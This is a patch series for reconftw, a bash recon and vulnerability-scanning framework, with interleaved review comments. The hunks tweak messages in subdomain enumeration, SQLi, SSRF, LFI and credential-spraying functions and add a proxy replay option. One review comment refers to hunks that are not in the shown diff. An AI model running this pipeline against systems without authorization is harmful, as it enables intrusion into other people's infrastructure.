@@ -127,7 +127,7 @@ function google_dorks(){
 end_func "Results are saved in osint/dorks.txt" ${FUNCNAME[0]}
 else
 if [ "$GOOGLE_DORKS" = false ] || [ "$OSINT" = false ]; then
- printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
 else
 printf "${yellow} ${FUNCNAME[0]} are already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
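Review bot: The `m )` arm is commented out, but the getopts string on the hunk header line still contains `m:`, so `-m company` is still accepted, still consumes its argument and is now silently ignored rather than reported as an unknown option. Remove it from the option string, `while getopts ":hd:-:l:x:i:varspxwo:" opt; do`, so `-m` reaches the `\?` handling (presumably present further down, outside this hunk). Relatedly, the usage line in the @@ -1659 hunk still advertises `[--fs]` while its description was deleted in @@ -1675; if the flag was removed, the usage line should drop it too, otherwise the description should stay.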
@@ -152,7 +152,7 @@ function github_dorks(){ end_func "Results are saved in osint/gitdorks.txt" ${FUNCNAME[0]} else if [ "$GITHUB_DORKS" = false ] || [ "$OSINT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -169,7 +169,7 @@ function metadata(){ end_func "Results are saved in osint/[software/authors/metadata_results].txt" ${FUNCNAME[0]} else if [ "$METADATA" = false ] || [ "$OSINT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -208,7 +208,7 @@ function emails(){ end_func "Results are saved in osint/[emails/users/h8mail/passwords].txt" ${FUNCNAME[0]} else if [ "$EMAILS" = false ] || [ "$OSINT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -251,7 +251,7 @@ function domain_info(){ end_func "Results are saved in osint/domain_info_[general/name/email/ip].txt" ${FUNCNAME[0]} else if [ "$DOMAIN_INFO" = false ] || [ "$OSINT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -358,7 +358,7 @@ function sub_crt(){ end_subfunc "${NUMOFLINES} new subs (cert transparency)" ${FUNCNAME[0]} else if [ "$SUBCRT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -411,7 +411,7 @@ function sub_brute(){ end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} else if [ "$SUBBRUTE" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -424,8 +424,8 @@ function sub_scraping(){ start_subfunc "Running : Source code scraping subdomain search" touch .tmp/scrap_subs.txt cat subdomains/subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt - cat subdomains/subdomains.txt | httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt - cat subdomains/subdomains.txt | httpx -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt + cat subdomains/subdomains.txt | httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt + cat subdomains/subdomains.txt | httpx -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt if [ "$DEEP" = true ] ; then gospider -S .tmp/probed_tmp_scrap.txt --js -t $GOSPIDER_THREADS -d 3 --sitemap --robots -w -r > .tmp/gospider.txt else 
@@ -439,7 +439,7 @@ function sub_scraping(){ end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} else if [ "$SUBSCRAPING" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -503,7 +503,7 @@ function sub_permut(){ end_subfunc "${NUMOFLINES} new subs (permutations)" ${FUNCNAME[0]} else if [ "$SUBPERMUTE" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -541,7 +541,7 @@ function sub_recursive(){ fi else if [ "$SUBRECURSIVE" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -561,7 +561,7 @@ function subtakeover(){ end_func "Results are saved in webs/takeover.txt" ${FUNCNAME[0]} else if [ "$SUBTAKEOVER" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -577,7 +577,7 @@ function zonetransfer(){ end_func "Results are saved in subdomains/zonetransfer.txt" ${FUNCNAME[0]} else if [ "$ZONETRANSFER" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -596,7 +596,7 @@ function s3buckets(){ end_func "Results are saved in subdomains/s3buckets.txt" ${FUNCNAME[0]} else if [ "$S3BUCKETS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -624,7 +624,7 @@ function webprobe_simple(){ end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} else if [ "$WEBPROBESIMPLE" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -642,7 +642,7 @@ function webprobe_full(){ end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]} else if [ "$WEBPROBEFULL" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -658,7 +658,7 @@ function screenshot(){ end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} else if [ "$WEBSCREENSHOT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -687,7 +687,7 @@ function favicon(){ end_func "Results are saved in hosts/favicontest.txt" ${FUNCNAME[0]} else if [ "$FAVICON" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -726,7 +726,7 @@ function portscan(){ end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]} else if [ "$PORTSCANNER" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -743,7 +743,7 @@ function cloudprovider(){ end_func "Results are saved in hosts/cloud_providers.txt" ${FUNCNAME[0]} else if [ "$CLOUD_IP" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -765,7 +765,7 @@ function waf_checks(){ end_func "Results are saved in webs/webs_wafs.txt" ${FUNCNAME[0]} else if [ "$WAF" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -800,7 +800,7 @@ function nuclei_check(){ end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} else if [ "$NUCLEICHECK" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -822,7 +822,7 @@ function fuzz(){ end_func "Results are saved in fuzzing/*subdomain*.txt" ${FUNCNAME[0]} else if [ "$FUZZ" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -849,7 +849,7 @@ function cms_scanner(){ end_func "Results are saved in cms/*subdomain* folder" ${FUNCNAME[0]} else if [ "$CMS_SCANNER" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -881,7 +881,7 @@ function params(){ end_func "Results are saved in webs/param.txt" ${FUNCNAME[0]} else if [ "$PARAMS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -939,7 +939,7 @@ function url_gf(){ end_func "Results are saved in gf folder" ${FUNCNAME[0]} else if [ "$URL_GF" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -961,7 +961,7 @@ function url_ext(){ end_func "Results are saved in webs/urls_by_ext.txt" ${FUNCNAME[0]} else if [ "$URL_EXT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -999,7 +999,7 @@ function jschecks(){ fi else if [ "$JSCHECKS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1021,7 +1021,7 @@ function wordlist_gen(){ end_func "Results are saved in webs/dict_[words|paths].txt" ${FUNCNAME[0]} else if [ "$WORDLIST" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1049,7 +1049,7 @@ function brokenLinks(){ end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]} else if [ "$BROKENLINKS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -1084,7 +1084,7 @@ function xss(){ end_func "Results are saved in vulns/xss.txt" ${FUNCNAME[0]} else if [ "$XSS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/xss.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to XSS ${reset}\n\n" else @@ -1102,7 +1102,7 @@ function cors(){ end_func "Results are saved in webs/cors.txt" ${FUNCNAME[0]} else if [ "$CORS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1132,7 +1132,7 @@ function open_redirect(){ fi else if [ "$OPEN_REDIRECT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/redirect.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to Open Redirect ${reset}\n\n" else @@ -1179,7 +1179,7 @@ function ssrf_checks(){ fi else if [ "$SSRF_CHECKS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/ssrf.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SSRF ${reset}\n\n" else 
@@ -1196,7 +1196,7 @@ function crlf_checks(){ end_func "Results are saved in vulns/crlf.txt" ${FUNCNAME[0]} else if [ "$CRLF_CHECKS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1214,7 +1214,7 @@ function lfi(){ end_func "Results are saved in vulns/lfi.txt" ${FUNCNAME[0]} else if [ "$LFI" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/lfi.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to LFI ${reset}\n\n" else @@ -1234,7 +1234,7 @@ function ssti(){ end_func "Results are saved in vulns/ssti.txt" ${FUNCNAME[0]} else if [ "$SSTI" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/ssti.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SSTI ${reset}\n\n" else @@ -1252,7 +1252,7 @@ function sqli(){ end_func "Results are saved in sqlmap folder" ${FUNCNAME[0]} else if [ "$SQLI" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/sqli.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SQLi ${reset}\n\n" else 
@@ -1269,7 +1269,7 @@ function test_ssl(){ end_func "Results are saved in hosts/testssl.txt" ${FUNCNAME[0]} else if [ "$TEST_SSL" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1286,7 +1286,7 @@ function spraying(){ end_func "Results are saved in hosts/brutespray.txt" ${FUNCNAME[0]} else if [ "$SPRAY" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1302,7 +1302,7 @@ function 4xxbypass(){ end_func "Results are saved in vulns/4xxbypass.txt" ${FUNCNAME[0]} else if [ "$BYPASSER4XX" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi From fee2ed6912a943e82f5b7708d3a856d5a69d5f35 Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 19 Apr 2021 09:30:03 +0200 Subject: [PATCH 09/19] Nuclei random headers && proxify feature --- reconftw.cfg | 3 ++- reconftw.sh | 59 ++++++++++++++++++++++++++++++++++------------------ 2 files changed, 41 insertions(+), 21 deletions(-) diff --git a/reconftw.cfg b/reconftw.cfg index 8fdbfada..c185541f 100644 --- a/reconftw.cfg +++ b/reconftw.cfg 
@@ -14,11 +14,11 @@ reset='\033[0m' # General values tools=~/Tools -NPROC=$(nproc || echo -n 1) SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" profile_shell=".$(basename $(echo $SHELL))rc" reconftw_version=$(git branch --show-current)-$(git describe --tags) update_resolvers=true +proxy_url="http://127.0.0.1:8080/" #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) @@ -106,6 +106,7 @@ NOTIFICATION=false DEEP=false DIFF=false REMOVETMP=false +PROXY=false # HTTP options HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" diff --git a/reconftw.sh b/reconftw.sh index 7703ae31..06e10dd1 100755 --- a/reconftw.sh +++ b/reconftw.sh 
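Review bot: The new `proxy_url` and `PROXY` keys in the two reconftw.cfg hunks carry no comment saying what enabling them does, while the reconftw.sh hunks of this same commit replay every line of webs/webs.txt, webs/webs_uncommon_ports.txt and webs/url_extract.txt through that address with `ffuf -replay-proxy`, so a reader of the config cannot tell how much traffic the switch turns on. Suggest `# PROXY=true replays every probed host and extracted URL through proxy_url via ffuf -replay-proxy` next to `PROXY=false`. The removal of `NPROC=$(nproc || echo -n 1)` in the first hunk is only safe if no remaining line of reconftw.sh still reads `$NPROC`; that cannot be confirmed from this diff and deserves a grep before merge.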
@@ -320,26 +320,27 @@ function sub_passive(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : Passive Subdomain Enumeration" - eval subfinder -d $domain -o .tmp/subfinder_psub.txt $DEBUG_STD - eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder_psub.txt - eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass_psub.txt $DEBUG_STD - eval findomain --quiet -t $domain -u .tmp/findomain_psub.txt $DEBUG_STD - eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt + eval subfinder -d $domain -o .tmp/subfinder_psub.txt $DEBUG_STD & + eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder_psub.txt & + eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass_psub.txt $DEBUG_STD & + eval findomain --quiet -t $domain -u .tmp/findomain_psub.txt $DEBUG_STD & + eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt & if [ -s "${GITHUB_TOKENS}" ];then if [ "$DEEP" = true ] ; then - eval github-subdomains -d $domain -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD + eval github-subdomains -d $domain -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD & else - eval github-subdomains -d $domain -k -q -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD + eval github-subdomains -d $domain -k -q -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD & fi fi - eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d' | anew -q .tmp/jldc_psub.txt - timeout 10m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt - timeout 10m gauplus -t $GAUPLUS_THREADS -random-agent -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt + eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 
| sed '/^\./d' | anew -q .tmp/jldc_psub.txt & + timeout 10m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt & + timeout 10m gauplus -t $GAUPLUS_THREADS -random-agent -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt & if echo $domain | grep -q ".mil$"; then mildew mv mildew.out .tmp/mildew.out cat .tmp/mildew.out | grep ".$domain$" | anew -q .tmp/mil_psub.txt fi + wait $(jobs -rp) NUMOFLINES=$(eval cat .tmp/*_psub.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/passive_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (passive)" ${FUNCNAME[0]} else @@ -553,7 +554,7 @@ function subtakeover(){ then start_func "Looking for possible subdomain takeover" touch .tmp/tko.txt - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/takeovers/ -r $resolvers_trusted -o .tmp/tko.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/takeovers/ -r $resolvers_trusted -o .tmp/tko.txt NUMOFLINES=$(eval cat .tmp/tko.txt $DEBUG_ERROR | anew webs/takeover.txt | wc -l) if [ "$NUMOFLINES" -gt 0 ]; then notification "${NUMOFLINES} new possible takeovers found" info @@ -621,7 +622,15 @@ function webprobe_simple(){ deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l) + end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} + + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] + then + notification "Sending websites to proxy" info + eval ffuf -mc all -w webs/webs.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD + fi + else if [ "$WEBPROBESIMPLE" = false ]; then printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" 
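Review bot: None of the eight tool invocations now sent to the background with `&` has its exit status checked, so a source that fails (missing binary, rate-limited API) silently contributes nothing and `NUMOFLINES` just counts what arrived; `wait $(jobs -rp)` also discards every child's status. Plain `wait` reaps the same children without the unquoted command substitution, and if best-effort is the intent a comment such as `# passive sources run concurrently; a failing source only shrinks the merged list` belongs above it. If failures should be visible instead, capture `$!` per job and use `wait "$pid" || notification "<tool> failed" warn`. sub_passive's opening `if` and its `else` branch are outside the hunk.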
